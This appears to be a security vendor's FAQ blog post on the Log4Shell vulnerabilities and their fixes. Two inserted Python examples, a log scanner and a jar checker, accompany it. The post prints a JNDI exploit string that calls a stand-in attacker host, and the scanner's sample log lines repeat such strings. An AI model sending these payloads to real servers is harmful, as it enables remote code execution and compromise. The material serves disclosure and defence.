CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabilities


A collection of frequently asked questions related to Log4Shell and associated vulnerabilities.

Background

Following the discovery of the Apache Log4j vulnerability known as Log4Shell on December 9, the Security Response Team has put together the following blog post to answer some of the more frequently asked questions (FAQ) about Log4Shell and the recently disclosed vulnerabilities in Log4j.

FAQ

What is Log4j?

Log4j is a widely used Java logging library included in Apache Logging Services. It is used to log messages from an application or service, often for debugging purposes.

What is CVE-2021-44228?

CVE-2021-44228 is a remote code execution (RCE) vulnerability in Apache Log4j 2.0 through 2.14.1. It has been dubbed Log4Shell by security researchers.

How can CVE-2021-44228 be exploited?

A remote, unauthenticated attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j. This could be achieved by submitting an exploit string into a text field on a website or by including the exploit string as part of HTTP headers destined for a vulnerable server. If the vulnerable server uses log4j to log requests, the exploit will then request a malicious payload from an attacker-controlled server through the Java Naming and Directory Interface (JNDI) over a variety of services, such as Lightweight Directory Access Protocol (LDAP).

An example exploit would look something like this:

${jndi:ldap://attackersite.com/exploit.class}

What happens if the vulnerability is exploited?

The vulnerable log4j library would request and execute a malicious payload from the attacker-controlled server.
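As an added example (not part of the post), a small Python detector that flags the exploit string shown above in web server access logs, whether it was logged raw in a header or percent-encoded in a request path. The log lines are constructed, and attackersite.com is the placeholder host from the example above.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic): one benign request, one
# with the lookup percent-encoded in the query string, one with it in User-Agent.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2Fattackersite.com%2Fexploit.class%7D HTTP/1.1" 200 88 "-" "curl/7.79"
10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://attackersite.com/a}"
"""

# A JNDI lookup as Log4j would resolve it: ${jndi:<scheme>://<host>...}. The post's
# example uses ldap; rmi and dns are the other JNDI providers commonly seen in logs.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)", re.IGNORECASE)

def find_jndi_lookups(line):
    """Return (scheme, callback host) for each JNDI lookup found in one log line.

    Access logs store request data percent-encoded, so the decoded line is
    checked as well as the raw one (headers are often logged as-is).
    """
    hits = []
    for text in (line, unquote(line)):
        for m in JNDI_LOOKUP.finditer(text):
            hit = (m.group("scheme").lower(), m.group("host").lower())
            if hit not in hits:
                hits.append(hit)
    return hits

def scan_access_log(log_text):
    """Map each 1-based line number carrying a JNDI lookup to its hits.

    Every hit is a CVE-2021-44228 exploitation attempt worth an alert; the
    callback host is the indicator to block at the egress firewall.
    """
    findings = {}
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        hits = find_jndi_lookups(line)
        if hits:
            findings[lineno] = hits
    return findings

if __name__ == "__main__":
    for lineno, hits in scan_access_log(SAMPLE_LOG).items():
        print(f"line {lineno}: JNDI lookup(s) {hits}")
```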

Have we seen any attacks in the wild so far?

Attackers have already begun using Log4Shell in a variety of ways, including:

  • Cryptocurrency mining software (cryptominers)
  • Distributed denial-of-service (DDoS) botnets
  • Ransomware

There are reports that both nation state groups and initial access brokers have already begun leveraging the flaw, which means we should expect advanced persistent threat (APT) groups and ransomware affiliates will likely be leveraging the flaw in the very near future.

Why is Log4Shell such a big deal?

Log4j is a widely used library across a number of products and services for logging purposes, which creates a large attack surface. Exploiting Log4Shell is simple, with readily available proof-of-concept code on GitHub. Finally, because many organizations don't know just how prevalent this library is within the products and services they use, this could likely have long-term effects.

Was Log4Shell addressed in Log4j 2.15.0?

No, Apache released Log4j 2.16.0 to address an incomplete fix for Log4Shell. Apache assigned a new CVE for this incomplete fix: CVE-2021-45046.

What is CVE-2021-45046?

CVE-2021-45046 was originally reported as a denial of service vulnerability in Apache Log4j 2.0 through 2.15.0, and has since been upgraded to an RCE. Under specific non-default configurations where a Context Lookup (e.g.: $${ctx:loginId}) is used, an attacker that crafts a JNDI lookup using malicious input data would be able to cause a DoS condition or execute RCE on a vulnerable server using Log4j 2.

Does the mitigation for Log4Shell apply to CVE-2021-45046?

No. According to Apache, the previous mitigation for CVE-2021-44228 — setting formatMsgNoLookups to true — is an insufficient mitigation altogether. That guidance failed to account for other code paths in which message lookups could occur. Because of this, Apache now recommends upgrading to a safe version of Log4j, starting with 2.16.0 and 2.12.2 (for Java 7). If that is not possible, Apache recommends removing the JndiLookup class from the classpath.

What does the release of Log4j 2.16.0 actually do?

Based on the release notes, Apache has chosen to harden Log4j by removing message lookups and disabling JNDI by default.

My organization uses Java 7 and we can't upgrade to Log4j 2.16.0. What do we do?

Apache released Log4j 2.12.2 to address CVE-2021-45046 for Java 7. If immediate patching is not possible, Apache advises removing the JndiLookup class from the classpath. Guidance on how to remove this class can be found in the Apache documentation.

Is Log4j 1.x vulnerable?

There is still a lot of information coming out surrounding Log4Shell. At the time this blog was published, Apache said that Log4j 1.2 is vulnerable in a similar manner when Log4j is configured to use JMSAppender, which is not part of the default configuration, but is not specifically vulnerable to CVE-2021-44228. This vulnerability in Log4j 1.2 has been assigned CVE-2021-4104.

Is there a patch available for Log4j 1.2?

No, Log4j branch 1.x has reached end of life (EOL) status, and so does not receive security updates. Users are instructed to upgrade to Log4j 2.12.2 (for Java 7) or 2.16.0 or greater.

How do I address CVE-2021-4104?

There are a few mitigation options that can be used to prevent exploitation of CVE-2021-4104.

  • Do not use the JMSAppender in the Log4j configuration
  • Remove the JMSAppender class file (org/apache/log4j/net/JMSAppender.class)
  • Limit OS user access to prevent an attacker from being able to modify the Log4j configuration

What's the story now with each of these vulnerabilities?

Here's what we know as of December 17:

  • Three CVEs have been assigned for vulnerabilities affecting Log4j

    CVE             Vulnerability Type                Affected Log4j Versions   Non-Default Config
    CVE-2021-44228  RCE                               2.0 through 2.14.1        No
    CVE-2021-45046  Denial of Service (DoS) and RCE   2.0 through 2.15.0        Yes
    CVE-2021-4104   RCE                               1.2*                      Yes

  • Only CVE-2021-44228 is exploitable out-of-the-box when Log4j versions 2.0 through 2.14.1 are included as a library in applications and services
  • CVE-2021-45046 and CVE-2021-4104 are only present in certain non-default configurations
  • CVE-2021-4104 will not be patched, as the Log4j 1.x branch has reached end-of-life

What are the fixed versions of Log4j that address these vulnerabilities?

Log4j Release   Java Version   Release Availability
2.16.0          Java 8         Yes
2.12.2          Java 7         Yes
1.2             -              No (EOL)
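An added Python example (not from the post or the Log4j project) that turns the version tables above and the JndiLookup/JMSAppender guidance earlier in the FAQ into an inventory check: it reads the log4j-core version from a jar's Maven pom.properties, classifies the jar by the version ranges stated here, recognizes a jar from which JndiLookup.class has already been removed, and performs that removal. The jars are constructed in memory, and the version parsing assumes plain dotted numeric versions.

```python
import io
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"   # Log4j 2
JMS_APPENDER_CLASS = "org/apache/log4j/net/JMSAppender.class"                # Log4j 1.x
VERSION_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def make_jar(entries):
    """Build a constructed in-memory jar from {path: bytes}, standing in for a real one."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for path, content in entries.items():
            jar.writestr(path, content)
    return buf.getvalue()

def log4j2_version(jar):
    """Return the log4j-core version from Maven pom.properties as a tuple, or None."""
    if VERSION_PROPS not in jar.namelist():
        return None
    props = dict(l.partition("=")[::2] for l in jar.read(VERSION_PROPS).decode().splitlines() if "=" in l)
    return tuple(int(p) for p in props["version"].strip().split(".")[:3]) if "version" in props else None

def assess_jar(data):
    """Classify a jar against the FAQ's tables: 'fixed', 'mitigated', or the list of CVEs."""
    jar = zipfile.ZipFile(io.BytesIO(data))
    names = set(jar.namelist())
    version = log4j2_version(jar)
    if version is not None:
        if version == (2, 12, 2) or version >= (2, 16, 0):
            return "fixed"                       # 2.12.2 (Java 7) or 2.16.0 and later
        if JNDI_LOOKUP_CLASS not in names:
            return "mitigated"                   # JndiLookup class already removed
        cves = []
        if version <= (2, 14, 1):
            cves.append("CVE-2021-44228")        # exploitable out of the box
        if version <= (2, 15, 0):
            cves.append("CVE-2021-45046")        # only with a non-default Context Lookup
        return cves
    # Log4j 1.x is EOL with no fix; it is affected only when JMSAppender is present and configured.
    return ["CVE-2021-4104"] if JMS_APPENDER_CLASS in names else "not log4j"

def remove_class(data, class_path):
    """Rewrite the jar without one entry: the classpath mitigation the FAQ describes."""
    src, out = zipfile.ZipFile(io.BytesIO(data)), io.BytesIO()
    with zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != class_path:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()
```

Point remove_class at JMS_APPENDER_CLASS to apply the second CVE-2021-4104 mitigation listed above to a Log4j 1.x jar.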

What is the likelihood of exploitation for these vulnerabilities?

The following table summarizes exploitability and whether or not a vulnerability was already being exploited.

CVE             Likelihood of Exploitation   Already Exploited
CVE-2021-44228  High                         Yes
CVE-2021-45046  Low                          No
CVE-2021-4104   Low                          No

Is Tenable vulnerable to any of the vulnerabilities in Log4j?

Tenable CISO Bob Huber has issued a full statement which can be found here.

How can I or my organization identify these vulnerabilities in Log4j?

Tenable has released a number of plugins, scan templates and dashboards (Tenable.io, Tenable.sc) for our products.

  • For updated information on the plugins that have been released, please refer to this post on the Tenable Community.
  • For updated information about scan templates that have been released, please refer to this post on the Tenable Community.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 30-day trial of Tenable.io Vulnerability Management.

Satnam Narang


Satnam joined Tenable in 2018 as a Senior Security Response Manager. He has over 15 years of experience in the industry (M86 Security and Symantec). He contributed to the Anti-Phishing Working Group, helped develop a Social Networking Guide for the National Cyber Security Alliance, uncovered a huge spam botnet on Twitter and was the first to report on spam bots on Tinder. He's appeared on NBC Nightly News, Entertainment Tonight, Bloomberg West, and the Why Oh Why podcast.

Interests outside of work: Satnam writes poetry and makes hip-hop music. He enjoys live music, spending time with his three nieces, football and basketball, Bollywood movies and music and Grogu (Baby Yoda).
